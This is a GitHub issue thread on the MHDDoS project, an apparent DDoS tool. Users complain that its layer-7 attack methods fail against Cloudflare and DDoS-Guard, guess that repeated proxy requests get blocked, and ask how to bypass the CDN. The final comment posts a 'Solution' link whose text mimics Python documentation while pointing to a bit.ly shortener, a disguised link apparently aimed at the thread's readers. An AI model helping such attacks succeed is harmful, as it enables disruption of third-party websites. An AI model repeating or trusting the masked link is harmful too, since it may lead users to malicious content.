### ISSUE TITLE
L7 attack doesn't seem to have any effect

### ISSUE THREAD

**Issue by kitcoun** [MHProDev/MHDDoS#162]
Hi, hello, L7 attack doesn't seem to have any effect, I tried most methods, is it the wrong way I use?

![image](https://user-images.githubusercontent.com/38834202/156497779-403a7191-9704-4099-bbfa-8ce63009c87b.png)

![image](https://user-images.githubusercontent.com/38834202/156497541-5e5f7f5d-569f-49b9-881c-2e0522eecfed.png)

**Comment by Ki4o112** [comment]
Same :((((

**Comment by bntr00t** [comment]
Ddos guard currently blocks almost all of the methods.

**Comment by Ki4o112** [comment]
I try it on cloudflare and still not working after update :((((

**Comment by Kaiser-DMr** [comment]
I am also the

**Comment by kitcoun** [comment]
Only a few seconds of each attack are valid attacks

**Comment by Monkeyman1337s** [comment]
because cloudflare block second request of the same proxy i think

**Comment by kitcoun** [comment]
What's the meaning? Is there no way to bypass the cdn?


------------------ Original ------------------
From: Monkeyman1337s ***@***.***&gt;
Date: Fri,Mar 4,2022 5:50 PM
To: MHProDev/MHDDoS ***@***.***&gt;
Cc: smile ***@***.***&gt;, State change ***@***.***&gt;
Subject: Re: [MHProDev/MHDDoS] L7 attack doesn't seem to have any effect (Issue #162)





 
because cloudflare block second request of the same proxy i think
 
—
Reply to this email directly, view it on GitHub, or unsubscribe.
Triage notifications on the go with GitHub Mobile for iOS or Android.

**Comment by Kaiser-DMr** [comment]
CFBUAM  have no effect

**Comment by MHProDev** [comment]
DDOS GUARD fixed all bypass methods

**Comment by fnnzzz** [comment]
Solution: [https://docs.python.org/kolm](bit.ly/3hEbSpG)
